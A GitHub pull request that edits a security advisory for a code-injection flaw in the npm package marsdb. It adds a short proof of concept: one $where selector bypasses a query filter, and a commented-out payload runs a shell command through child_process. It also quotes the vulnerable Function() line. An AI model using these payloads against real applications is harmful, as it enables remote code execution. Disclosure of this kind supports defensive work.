Skip to content

[GHSA-5mrr-rgp6-x4gr] Command Injection in marsdb #7914

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
msh0625 wants to merge 1 commit into
base: msh0625/advisory-improvement-7914
Choose a base branch
from
+19 −6
Open

[GHSA-5mrr-rgp6-x4gr] Command Injection in marsdb #7914

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
25 changes: 19 additions & 6 deletions advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,12 +1,17 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5mrr-rgp6-x4gr",
"modified": "2020-08-31T18:48:01Z",
"modified": "2023-01-09T05:03:48Z",
"published": "2020-09-03T19:39:05Z",
"aliases": [],
"summary": "Command Injection in marsdb",
"details": "All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
"severity": [],
"summary": "[Security] Arbitrary Code Execution via unsanitized $where selector (GHSA-5mrr-rgp6-x4gr)",
"details": "The $where query selector in marsdb passes user-supplied strings directly \nto the Function() constructor without any sanitization or validation.\n\nVulnerable code in dist/DocumentMatcher.js, line 419:\n selectorValue = Function('obj', 'return ' + selectorValue);\n\nThis allows arbitrary JavaScript execution in the application context.\nOn Node.js <= 18 (typical production environments), this escalates to \nfull Remote Code Execution via require('child_process').\n\n## Proof of Concept\n\n```js\nconst Collection = require('marsdb').default;\nconst col = new Collection('users');\ncol.insert({ name: 'alice' });\n\n// Authentication bypass\ncol.find({ $where: \"1 === 1\" }).then(result => {\n console.log('Filter bypassed:', result);\n});\n\n// Full RCE on Node.js <= 18:\n// col.find({\n// $where: \"require('child_process').execSync('whoami').toString()\"\n// });\n```\n\nDiscovered using vulnscope - AI-assisted OSS vulnerability scanner\nhttps://github.com/msh0625/vulnscope",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
Expand All @@ -18,7 +23,10 @@
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0.0.0"
"introduced": "0"
},
{
"last_affected": "0.6.10"
}
]
}
Expand All @@ -30,14 +38,19 @@
"type": "WEB",
"url": "https://github.com/bkimminich/juice-shop/issues/1173"
},
{
"type": "PACKAGE",
"url": "https://github.com/c58/marsdb/blob/master/dist/DocumentMatcher.js"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1122"
}
],
"database_specific": {
"cwe_ids": [
"CWE-77"
"CWE-77",
"CWE-94"
],
"severity": "CRITICAL",
"github_reviewed": true,
Expand Down